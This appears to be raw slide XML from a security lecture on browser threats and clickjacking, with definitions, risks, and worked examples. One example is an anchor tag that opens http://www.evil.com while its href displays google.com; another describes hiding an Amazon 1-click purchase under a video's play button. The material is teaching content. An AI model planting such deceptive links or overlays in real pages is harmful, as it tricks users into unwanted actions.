          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>https://www.statista.com/statistics/203186/top-endpoint-security-incidents-usa/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Oval 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5070AE14-974F-4D1E-B8B3-FF916BCCADF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="5320453"/>
            <a:ext cx="4419600" cy="394547"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="C00000"/>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047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78B11C-813A-4B80-8F4B-67743FA67109}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Clickjacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F77698EA-2AED-40C6-9C7C-BFA1B77B501F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1524000"/>
            <a:ext cx="9144000" cy="4540338"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1A48474-FCBD-4F63-BF4A-B98E4C0492E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="6400800"/>
            <a:ext cx="6852453" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>https://www.infosecurity-magazine.com/news/clickjacking-threatens-two-thirds-of-top-20/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="184846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78B11C-813A-4B80-8F4B-67743FA67109}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Clickjacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F77698EA-2AED-40C6-9C7C-BFA1B77B501F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1524000"/>
            <a:ext cx="9144000" cy="4540338"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1A48474-FCBD-4F63-BF4A-B98E4C0492E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="6400800"/>
            <a:ext cx="6852453" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>https://www.infosecurity-magazine.com/news/clickjacking-threatens-two-thirds-of-top-20/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Oval 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7247F097-5BF0-418C-A8B2-00261D8BDF85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="3017837"/>
            <a:ext cx="5486400" cy="1630363"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="C00000"/>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7122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E02E-22C8-438C-9151-3A01ADECF692}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Clickjacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C79F191B-D623-47F1-80E5-D2D2C22CDAAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="494534" y="2481262"/>
            <a:ext cx="8649466" cy="1895475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="456515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Clickjacking</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="fig04-13.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075" b="-8587"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1741469" y="1344703"/>
            <a:ext cx="5654408" cy="5335593"/>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36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Aria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119281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38BE-7EBC-F64C-B29E-1E6E3809242F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Clickjacking Attacks </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BBA2F07-3771-1D4B-A56A-5D2CF877BBBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Clickjacking is a way of tricking users into providing desired input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The attacker makes the input dialog transparent and places an image with an enticement below the transparent dialog</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BCB8C2D-C467-BC4F-B624-C844EB7936FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5BFA158B-7C94-F543-87DB-41F59EA4FAFA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:pPr/>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="444203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38BE-7EBC-F64C-B29E-1E6E3809242F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Clickjacking Attacks </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BBA2F07-3771-1D4B-A56A-5D2CF877BBBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The user ends up answering a question he didn’t even know he was being asked</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>unknowingly authorizing his computer to execute the attacker’s will</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“Framing”—moving and layering HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>iframes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>—is an important component of this attack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BCB8C2D-C467-BC4F-B624-C844EB7936FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5BFA158B-7C94-F543-87DB-41F59EA4FAFA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:pPr/>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2155911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Clickjacking</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="fig04-13.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075" b="-8587"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1741469" y="1344703"/>
            <a:ext cx="5654408" cy="5335593"/>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39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Aria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0433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3A23-BEA9-504B-A1CC-9426F65861C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browsers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F40C4466-A933-E645-B111-D31EE06E0BA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The software most users use as the gateway to the Internet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Internet access enables certain security threats and vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Focus on user side: What harm may come to an individual user interacting with Internet locations?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6428F5D7-83C2-5E4F-8033-2C6AC3D820D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4032094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72200" cy="1096962"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Clickjacking Attacks </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A.K.A. User Interface (UI) redress attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tricking a user into clicking on something different from what he thinks he is clicking on</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Risks:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>potentially revealing confidential information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Taking control of their computer while clicking on seemingly innocuous web pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exists in a variety of browsers and platforms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28600"/>
            <a:ext cx="2423064"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4800" y="6172200"/>
            <a:ext cx="6998519" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>https://neelbhatt.com/2018/02/16/secure-net-core-applications-from-click-jacking-net-core-security-part-iii/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1031587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 Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How does it happen?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371600"/>
            <a:ext cx="2423064"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4917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 Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How does it happen?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>onMountUp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>window.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(http://www.evil.com)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=http://www.google.com/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Go to Google&lt;/a&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What happens with this code?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A window opens to the attacker website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="327287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 Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>onMountUp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>window.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(http://www.evil.com)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=http://www.google.com/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Go to Google&lt;/a&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Why include </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to Google?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browser status bar will show URL when hovering </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To protect the user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User tricked by seeing the wrong reference</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2188635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 Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example 2:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A user might receive an email with a link to a video about a news item</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Another webpage may be "hidden" on top or underneath the "PLAY" button of the news video</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>E.g., a product page on Amazon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The user tries to "play" the video </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>actually "buys" the product from Amazon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attack will work if visitor is both logged into Amazon.com and has 1-click ordering enabled</a:t>
